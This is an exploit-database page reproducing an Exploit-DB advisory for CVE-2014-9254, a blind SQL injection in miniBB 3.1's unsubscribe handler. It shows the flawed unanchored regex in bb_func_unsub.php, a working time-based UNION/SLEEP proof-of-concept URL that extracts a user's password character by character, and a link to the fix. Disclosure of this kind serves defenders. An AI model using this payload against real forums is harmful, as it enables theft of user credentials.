header-logo
Suggest Exploit
vendor:
miniBB
by:
Kacper Szurek
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: miniBB
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: YES
Related CWE: CVE-2014-9254
CPE: a:minibb:minibb:3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2014

miniBB 3.1 Blind SQL Injection

preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp). File: bb_func_unsub.php $usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0); $allowUnsub=FALSE; $chkCode=FALSE; if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){ //trying to unsubscribe directly from email $chkField='email_code'; $chkVal=$_GET['code']; $userCondition=TRUE; $chkCode=TRUE; } else{ //manual unsubsribe $chkField='user_id'; $chkVal=$user_id; $userCondition=($usrid==$user_id); } if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))

Mitigation:

Update to the latest version of miniBB
Source

Exploit-DB raw data:

# Exploit Title: miniBB 3.1 Blind SQL Injection
# Date: 23-11-2014
# Software Link: http://www.minibb.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9254
# Category: webapps

1. Description
  
preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp).

File: bb_func_unsub.php
$usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);

$allowUnsub=FALSE;
$chkCode=FALSE;

if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){
	//trying to unsubscribe directly from email
	$chkField='email_code';
	$chkVal=$_GET['code'];
	$userCondition=TRUE;
	$chkCode=TRUE;
}
else{
	//manual unsubsribe
	$chkField='user_id';
	$chkVal=$user_id;
	$userCondition=($usrid==$user_id);
}

if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))

http://security.szurek.pl/minibb-31-blind-sql-injection.html
  
2. Proof of Concept

http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '

This SQL will check if first password character user ID=1 is “c”.

If yes, it will sleep 5 seconds.
  
3. Solution:
  
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html

Navigation

Suggest Exploit

Services By CQR